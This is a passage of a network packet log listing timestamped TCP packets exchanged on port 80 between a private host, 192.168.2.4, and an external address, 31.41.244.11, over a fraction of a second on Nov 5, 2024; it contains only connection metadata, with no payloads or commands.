Nov 5, 2024 18:46:10.314486027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314492941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314512014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314533949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314539909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314549923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314567089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314579964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314610004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314610004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314647913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314661026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314670086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314680099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314691067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314696074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314702034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314724922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314743996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314745903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314788103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314831972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314841986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314851046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314862013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314871073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314873934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314879894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314884901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314902067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314924002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314954042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314965963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314975023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.314990997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.314992905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315002918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315012932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315020084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315030098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315053940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315053940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315223932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315233946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315243959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315253973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315264940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315273046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315273046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315274000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315284014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315295935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315296888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315306902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315314054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315336943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315366030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315443039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315453053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315464020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315474033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315485001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315495014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315502882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315506935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315515995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315520048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315531015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315552950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315553904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315577030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315577030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315609932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315618992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315685987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315695047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315706015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315728903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315754890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315754890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315854073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315864086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315874100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315882921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315888882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315900087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315901041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315910101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315918922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315922022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315929890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315939903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.315948963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315948963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.315987110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320473909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320489883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320501089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320524931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320545912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320617914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320627928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320641041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320666075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320678949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320730925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320770025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320780993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320784092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320810080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320893049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320902109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320913076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.320935011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.320961952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.321110010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.321120024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.321167946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.321474075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.321521997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.321541071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.321549892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.321567059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.321573973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.321578026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.321604013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.321604013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322127104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322138071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322148085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322170973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322195053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322195053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322205067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322215080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322226048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322244883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322244883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322256088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322837114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322884083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322913885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322921991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322933912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322945118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322954893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.322962999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322967052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.322990894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.323031902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323065996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323076010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323079109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.323110104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.323215008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.323657036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323668003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323678970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323707104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.323734045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.323940992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323980093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.323990107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.324007034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.324014902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.324034929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.324631929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.324681997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.324708939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.324719906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.324729919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.324749947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.324771881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.325844049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.325891018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.325922012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.325932980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.325993061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.326314926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.326334953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.326350927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.326361895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.326366901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.326371908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.326374054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.326385021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.326396942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.326405048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.326431036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.327069998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.327116966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.327133894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.327145100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.327179909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.327786922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.327800035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.327810049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.327833891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.327861071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.328660965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.328671932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.328682899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.328706980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.328732967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.328912973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.328922987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.328933001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.328959942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.328994036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.329840899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.329852104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.329863071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.329894066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.329915047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.330583096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.330602884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.330626011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.330646992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.330749989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.330794096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.330799103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.330837965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331078053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331089973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331100941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331120968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331124067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331131935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331141949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331146955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331188917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331353903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331373930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331384897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331396103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331428051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331445932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331458092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331469059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331480980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331492901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331516027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331556082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331568003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331578016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331588984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331603050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331604004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331614971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331624985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331630945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331634045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331640959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331645966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331655979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331660986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331666946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331684113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331712961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331741095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331752062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331763029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331773996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331787109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331810951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331818104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331821918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331834078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331847906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331851959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331865072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331875086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331876040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331888914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331899881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331937075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.331943035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331954956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331973076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.331989050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332004070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332022905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332035065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332045078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332062006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332067966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332076073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332093954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332113981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332145929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332158089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332170963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332184076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332189083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332195044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332206011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332211971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332222939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332247019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332250118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332262039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332278967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332288027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332290888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332319021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332333088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332350016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332377911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332391977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332393885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332396984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332410097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332418919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332423925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332431078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332434893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332459927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332479954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332492113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332495928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332498074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332509995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332526922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332552910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332701921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332714081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332725048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332751989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332771063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332777977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332788944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332799911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332813978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332827091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332838058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332842112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332842112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332842112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332859993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332859993 CET	49804	80	192.168.2.4	31.41.244.11
